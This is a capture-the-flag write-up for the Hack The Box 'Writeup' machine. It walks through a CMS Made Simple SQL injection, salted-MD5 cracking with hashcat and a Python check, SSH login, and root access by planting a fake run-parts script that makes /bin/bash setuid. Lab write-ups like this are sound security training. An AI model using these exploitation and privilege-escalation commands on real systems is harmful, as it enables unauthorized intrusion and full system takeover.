This post documents my process for solving the Writeup box on Hack The Box. The machine revolves around web enumeration, CMS exploitation, SQLi, hash cracking, and privilege escalation via PATH hijacking.

Recon

Target: 10.10.10.138

nmap -sC -sV 10.10.10.138

Results:

  • 22/tcp (SSH) OpenSSH 9.2p1 Debian
  • 80/tcp (HTTP) Apache httpd 2.4.25 (Debian)
  • robots.txt has a disallowed entry: /writeup/
  • Site uses CMS Made Simple, version 2.2.9.1

CMS Exploitation

Accessed /writeup and /writeup/doc/CHANGELOG.txt to confirm CMS version.

Searched for vulnerabilities in CMS Made Simple < 2.2.10 and found an SQLi exploit.

Ran the exploit script, retrieved:

[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7

Hash Cracking

Discovered that the hash is md5(salt + password) (mode 20 in hashcat). Format for hashcat:

hash:salt

Created a text file and ran:

hashcat -m 20 hashcat.txt /usr/share/wordlists/rockyou.txt

Output:

62def4866937f08cc13bab43bb14e6f7:5a599ef579066807:raykayjay9
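As an added illustration (not part of the original walkthrough), a short Python check that reproduces what hashcat mode 20 computes, builds the hash:salt line from the SQLi output, and verifies the cracked password offline. The page's own salt, hash and cracked password are reused; the small candidate list is constructed for the demonstration.

```python
import hashlib
import hmac

# Values recovered earlier in the walkthrough (SQLi output and hashcat result).
SALT = "5a599ef579066807"
STORED_HASH = "62def4866937f08cc13bab43bb14e6f7"
CRACKED = "raykayjay9"


def cmsms_hash(salt: str, password: str) -> str:
    """md5(salt + password): what hashcat mode 20, md5($salt.$pass), computes."""
    return hashlib.md5((salt + password).encode()).hexdigest()


def pass_salt_hash(salt: str, password: str) -> str:
    """md5(password + salt): hashcat mode 10, the other ordering.

    Included only to show why getting the salt position right matters;
    the same password gives a different digest under this ordering."""
    return hashlib.md5((password + salt).encode()).hexdigest()


def to_hashcat_line(stored_hash: str, salt: str) -> str:
    """Build the hash:salt line that hashcat -m 20 expects as input."""
    return f"{stored_hash.lower()}:{salt}"


def verify(stored_hash: str, salt: str, candidate: str) -> bool:
    """Check one candidate against the stored salted hash (constant-time compare)."""
    return hmac.compare_digest(cmsms_hash(salt, candidate), stored_hash.lower())


def find_match(stored_hash: str, salt: str, candidates):
    """Return the first candidate that reproduces the stored hash, or None."""
    for candidate in candidates:
        if verify(stored_hash, salt, candidate):
            return candidate
    return None


if __name__ == "__main__":
    # Constructed mini wordlist standing in for rockyou.txt.
    wordlist = ["password", "writeup", "raykayjay9", "letmein"]
    print(to_hashcat_line(STORED_HASH, SALT))
    print("match:", find_match(STORED_HASH, SALT, wordlist))
    print("mode 10 ordering matches:", pass_salt_hash(SALT, CRACKED) == STORED_HASH)
```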

SSH Access

Login with SSH:

  • User: jkr
  • Pass: raykayjay9

Obtained user flag.

Privilege Escalation (PATH Hijacking)

id output for user jkr:

jkr@writeup:~$ id
uid=1000(jkr) gid=1000(jkr) groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev)

Being in the staff group allows writing to /usr/local/bin.

Ran pspy and observed root running:

sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new

Exploited PATH hijacking:

echo -e '#!/bin/bash\n\nchmod u+s /bin/bash' > /usr/local/bin/run-parts; chmod +x /usr/local/bin/run-parts

After logging out and back in, saw:

CMD: UID=0 ... | chmod u+s /bin/bash

Now /bin/bash is setuid root. Spawn a root shell with:

/bin/bash -p
whoami
# root

Lessons Learned

  • Enumeration of service versions and configuration is critical.
  • Check for SQLi in known vulnerable CMS installations and crack hashes carefully, making sure the hash and salt formats are understood.
  • Privilege escalation can be achieved by abusing PATH and writable directories.
  • Tools like pspy are invaluable for observing system-level scheduled jobs and root actions.
  • Membership in groups like staff can grant unexpected privileges (e.g., writing to /usr/local/bin).

Writeup based on my own exploitation process, with inspiration from official writeups and community references.